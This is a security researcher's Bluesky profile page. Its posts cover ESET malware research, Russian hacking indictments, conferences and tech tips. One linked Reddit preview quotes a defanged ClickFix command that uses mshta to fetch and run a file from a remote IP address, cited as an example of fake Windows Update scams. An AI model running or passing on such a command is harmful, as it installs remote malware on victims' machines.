Aryeh Goretsky's Avatar

Aryeh Goretsky

@goretsky.bsky.social

@ESET Distinguished Researcher | alum of McAfee, Microsoft MVP, Tribal Voice, Zultys | Mod @Lenovo, @Neowin.Net, Scots Newsletter forums | Intel Insider Council | Repost ≠ endorse

990 Followers  |  3,266 Following  |  109 Posts  |  Joined: 07.02.2024  |  1.6227

Latest posts by goretsky.bsky.social on Bluesky

One of the things I'm really big on is communities, and one that regularly polls its members generates interesting data. Here's an article I wrote about tech news site @neowin.net's software + hardware polls, looking at some of that data.

05.02.2026 07:38 — 👍 2    🔁 0    💬 0    📌 0

#BREAKING #ESETresearch provides technical details on #DynoWiper, a data‑wiping malware used in a data‑destruction incident on December 29, 2025, affecting a company in Poland’s energy sector. www.welivesecurity.com/en/eset-rese... 1/5

30.01.2026 10:29 — 👍 11    🔁 9    💬 1    📌 1
Preview
Love? Actually: Fake dating app used as lure in targeted spyware campaign in Pakistan ESET researchers discover an Android spyware campaign targeting users in Pakistan via romance scam tactics, revealing links to a broader spy operation.

#ESETresearch has uncovered a new #Android spyware campaign using novel romance scam tactics to target individuals in 🇵🇰 Pakistan, with an added social engineering element previously unseen in similar schemes. www.welivesecurity.com/en/eset-rese... 1/9

28.01.2026 10:49 — 👍 9    🔁 4    💬 1    📌 0

#BREAKING #ESETresearch identified the wiper #DynoWiper used in an attempted disruptive cyberattack against the Polish energy sector on Dec 29, 2025. At this point, no successful disruption is known, but the malware’s design clearly indicates destructive intent. 1/5

23.01.2026 16:30 — 👍 35    🔁 30    💬 1    📌 5
Post image

In H2 2025, #ESETresearch saw a thirtyfold increase in #CloudEyE detections, amounting to more than 100,000 hits over the course of six months. CloudEyE is a #MaaS downloader and cryptor used to conceal and deploy other malware, such as #Rescoms, #Formbook, and #Agent Tesla. 1/5

06.01.2026 10:03 — 👍 5    🔁 2    💬 1    📌 0

Nice.

03.01.2026 08:23 — 👍 5    🔁 0    💬 0    📌 0

It was 25 years ago this month that Tribal Voice's PowWow messaging software shut down.

It is just an internet footnote now, but Tribal Voice, which was founded by John McAfee, invented much of the technology used by today's messaging software.

03.01.2026 05:52 — 👍 2    🔁 0    💬 0    📌 0

In 2025, #ESETresearch analyzed hundreds of hands-on-keyboard ransomware attacks, mostly hitting manufacturing, construction, retail, technology, and healthcare. Most of these were seen in the US (17%), Spain (5%), and France, Italy, and Canada (4% each). 1/5

29.12.2025 11:46 — 👍 4    🔁 4    💬 1    📌 0
Preview
Introducing Panther Lake: By the Numbers Intel® Core™ Ultra series 3 processors go on sale in January 2026

Yes, an Intel Core Ultra 3 series CPU. They were announced a couple of months ago: newsroom.intel.com/client-compu...

23.12.2025 21:43 — 👍 1    🔁 0    💬 0    📌 0
Post image

#ESETresearch has revisited CVE 2025 50165, a critical remote code execution vulnerability in the WindowsCodecs.dll library when processing JPG images, one of the most widely used image format s. www.welivesecurity.com/en/eset-rese... 1/6

23.12.2025 12:28 — 👍 3    🔁 2    💬 1    📌 0

Exactly the sort of thing Microsoft should be focusing on—under the hood performance improvements to Windows.

23.12.2025 01:09 — 👍 3    🔁 0    💬 1    📌 0
Preview
LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan ESET researchers discovered a China-aligned APT group, LongNosedGoblin, which uses Group Policy to deploy cyberespionage tools across networks of governmental institutions.

#ESETresearch has discovered a new 🇨🇳-aligned APT group, #LongNosedGoblin. This group focuses on cyberespionage and targets mainly governmental entities in Southeast Asia and Japan. www.welivesecurity.com/en/eset-rese... 1/7

18.12.2025 13:08 — 👍 6    🔁 7    💬 1    📌 0
Preview
Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows The US indicts Russian hackers for cyberattacks on critical infrastructure, detailing incidents in Missouri, Texas, and California.

Russian GRU Orchestrated Cyberattacks on US Airports, Water Systems, and Food Supply, Newly Released Indictment Shows
united24media.com/latest-news/...
via @united24media.com

14.12.2025 23:15 — 👍 1    🔁 1    💬 0    📌 0
Post image

🔴 The US has unsealed an indictment revealing how Russian GRU hackers targeted critical infrastructure, including a Missouri regional airport, water facilities in Texas, Pennsylvania, and Indiana, and a California meat-packing plant.

13.12.2025 11:15 — 👍 128    🔁 49    💬 10    📌 7
Preview
Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups The Justice Department announced two indictments in the Central District of California charging Ukrainian national Victoria Eduardovna Dubranova, 33, also known as Vika, Tory, and SovaSonya, for her r...

Justice Department Announces Actions to Combat Two Russian State-Sponsored Cyber Criminal Hacking Groups www.justice.gov/opa/pr/justi...

10.12.2025 17:31 — 👍 1    🔁 0    💬 0    📌 0
What is this "cmd /c start mshta "http[:]//195[.]133[.]9[.]111/swear[.]odd" and how can i deal with this? Posted in r/antivirus by u/remimages • 1 point and 4 comments

Interesting. Seems ClickFix/Fake CAPTCHA scams are migrating to fake Windows Update messages:
old.reddit.com/r/antivirus/...

06.12.2025 08:18 — 👍 1    🔁 0    💬 0    📌 0

#ESETresearch analyzed the #Gamaredon VBScript payload recently flagged by @ClearskySec. It wipes registry Run keys, scheduled tasks, and kills processes – however, our assessment is that this is likely to clean researchers’ machines, not a shift to destructive ops. x.com/ClearskySec/... 1/4

05.12.2025 08:49 — 👍 4    🔁 2    💬 1    📌 0
Preview
MuddyWater: Snakes by the riverbank MuddyWater targets critical infrastructure in Israel and Egypt, relying on custom malware, improved tactics, and a predictable playbook.

#ESETresearch discovered a new #MuddyWater campaign targeting critical infrastructure in 🇮🇱 Israel and 🇪🇬 Egypt, using a new backdoor – MuddyViper – and a variety of post-compromise tools www.welivesecurity.com/en/eset-rese... 1/7

02.12.2025 11:42 — 👍 7    🔁 6    💬 1    📌 0
Post image

#ESETresearch is heading to #AVAR2025? Dec 4, Thursday in Kuala Lumpur, 11:00–11:30 MYT.
ESET researchers Anton Cherepanov & Peter Strýček present: "Sniffing Around: Unmasking the LongNosedGoblin operation in Southeast Asia and Japan”. 1/3

01.12.2025 13:39 — 👍 3    🔁 3    💬 1    📌 0
Post image Post image

NEW: Israeli and Arab media have reported that Iran is prepared to expand an Israel-Hezbollah conflict regionally if Israel launches operations against Hezbollah. 🧵(1/4)

Full update: isw.pub/IranUpdate12...

02.12.2025 01:28 — 👍 99    🔁 24    💬 5    📌 2

Oof… you're right. It's flagged as an impersonation account.

01.12.2025 01:45 — 👍 1    🔁 0    💬 0    📌 0
Post image Post image

I don't normally have a lot to say about my Congressperson Jeff Crank, but kudos to him & his staff for this mailing; the holidays are prime time for scammers to prey on people & this is a good reminder.
Only thing I'd add is a link to @cisa.bsky.social, since so much crime takes place online now.

30.11.2025 09:22 — 👍 1    🔁 0    💬 1    📌 0
Preview
Trip Report: BSidesCOS 2025 If you go on a business trip, it is bring value to your employer in some way. As an antivirus researcher, my business trips are typically to conferences, and what I am expected to bring back is kno…

My trip report for #BSides Colorado Springs 2025 computer security conference is now live at goretsky.wordpress.com/2025/11/26/t....

If you don't know what a trip report is, or are interested in what happened at this year's #BSides, perhaps you'll find this of interest.

26.11.2025 22:16 — 👍 2    🔁 0    💬 0    📌 0
Post image

#ESETresearch discovered unique toolset, QuietEnvelope, targeting the MailGates email protection system of Taiwanesw co OpenFind. The toolset was uploaded in an archive, named spam_log.7z, to VirusTotal from Taiwan. It contains Perl scripts, 3 stealthy backdoors, argument runner, and misc files. 1/8

24.11.2025 17:57 — 👍 10    🔁 10    💬 1    📌 0

My in-depth (~15 page) review of the #Lenovo #ThinkPad X9 15 Gen 1 Aura Edition after 6+ months of use is now up on @neowin.net!

#ThinkPadThursday #LenovoIN

21.11.2025 22:12 — 👍 2    🔁 0    💬 0    📌 0
Preview
PlushDaemon compromises network devices for adversary-in-the-middle attacks ESET researchers have discovered a network implant used by the China-aligned PlushDaemon APT group to perform adversary-in-the-middle attacks.

#ESETresearch discovered and analyzed a previously undocumented malicious tool for network devices that we have named #EdgeStepper, enabling China-aligned #PlushDaemon APT to perform adversary-in-the-middle to hijack updates to deliver malware. www.welivesecurity.com/en/eset-rese... 1/5

19.11.2025 10:12 — 👍 13    🔁 8    💬 1    📌 0

Glad to be of assistance. Hopefully @mozilla.org will take notice and remove this feature or at least make it opt-in by *default*.

18.11.2025 00:33 — 👍 1    🔁 0    💬 0    📌 0

Looks like @mozilla.org has added a new feature to #Firefox, the ability to search for images via #Google Lens when right-clicking on them.

Anyways, to disable it, go to "about:config" in the address bar and set browser.search.visualSearch.featureGate to "false"

17.11.2025 04:47 — 👍 4    🔁 0    💬 1    📌 0
Post image

#ESETresearch identified an active campaign distributing #NGate – Android NFC relay malware used for contactless payment fraud – targeting Brazilian users.
It is available for download via fake Google Play sites mimicking 4 major banks and 1 e-commerce app. 1/4

06.11.2025 14:00 — 👍 3    🔁 3    💬 1    📌 0

David Harley was a brilliant writer, illustrator, and musician. More importantly, he was a good friend, and he will be missed. The world was a much brighter place for having him in it, and his passing diminishes us all.

14.11.2025 03:02 — 👍 5    🔁 0    💬 0    📌 0

@goretsky is following 17 prominent accounts